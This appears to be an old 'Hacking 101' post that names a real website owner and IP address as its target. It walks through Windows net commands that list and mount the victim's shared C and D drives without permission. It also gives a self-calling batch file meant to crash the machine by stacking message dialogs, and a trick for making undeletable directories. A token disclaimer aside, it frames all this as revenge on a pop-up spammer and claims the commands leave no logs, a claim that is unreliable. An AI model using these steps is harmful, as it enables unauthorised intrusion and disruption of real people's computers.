Hacking 101 - DO NOT DO BAD THINGS WITH THIS INFO TOWARDS specialized-pc.com I am using him as a working example and maybe he can fix his security holes now that they have been pointed out.
This guy suxors for security, I can use him as a example on how to dissassemble someone who spams or uses pop-ups that really piss you off.
ping www.specialized-pc.com to get IP
net send 63.119.175.55 Hi! (sends Hi! to his console)
Net view \\63.119.175.55 (shows his shared drives =P)
net use * \\63.119.175.55\CDRIVE (mounts his c drive)
net use * \\63.119.175.55\DDRIVE (mounts his d drive)
Ok, not that you can send messages to his console and mount his drives have fun with him
If you make directories with .lpt or .com1 or .aux they are undeletable
Ok, you got the basics, now lets go make a batch file named popups.bat
REM This file is to crash machine serving pop ups.
net send VICTIMS_IP I hate popups!
call popups.bat
REM end of file
run the batch file. it will send "I hate popups" to the console stacking dialog boxes one on top of each other.
If you have trouble mounting drives, remove your administrator password.
There is no logging for net commands, only way to detect someone is to use the command net users.